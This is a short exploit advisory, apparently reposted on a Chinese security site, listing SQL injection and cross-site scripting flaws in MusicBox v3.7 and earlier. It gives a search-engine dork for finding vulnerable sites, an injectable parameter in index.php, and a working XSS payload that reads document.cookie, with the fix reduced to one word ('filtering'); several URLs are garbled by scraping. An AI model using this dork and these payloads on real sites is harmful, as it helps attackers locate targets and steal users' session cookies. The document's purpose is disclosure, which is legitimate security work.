Musicbox v3.7及以前班多多重缺陷及修复 - 网站安全

 

============================================================

MusicBox <= v3.7 Multiple Vulnerabilities

============================================================

 

 

[~] Author : R@1D3N (amin emami)

 

[~] Software Link : HdhCmsTestmusicboxv2测试数据

 

[~] Price : $275

 

[~] Version : v3.7 and previous versions

 

[~] Contact : aminrayden@yahoo测试数据

 

<script type="text/javascript">

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</script> <~

 

[~] DorK : inurl:genre_artists.php

 

[~] Forum : http://ashiyane.org/forums/

 

[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db

 

[~] Tested on: Windows XP Sp3

 

vul1.sql injection:

 

/HdhCmsTest2cto测试数据 /index.php?action=top&type=Songs&show=10'[ SQL ATTACK]

 

Vul2.Cross site Scripting:

 

/HdhCmsTest2cto测试数据 /index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0

 

修复：过滤

查看更多关于Musicbox v3.7及以前班多多重缺陷及修复 - 网站安全的详细内容...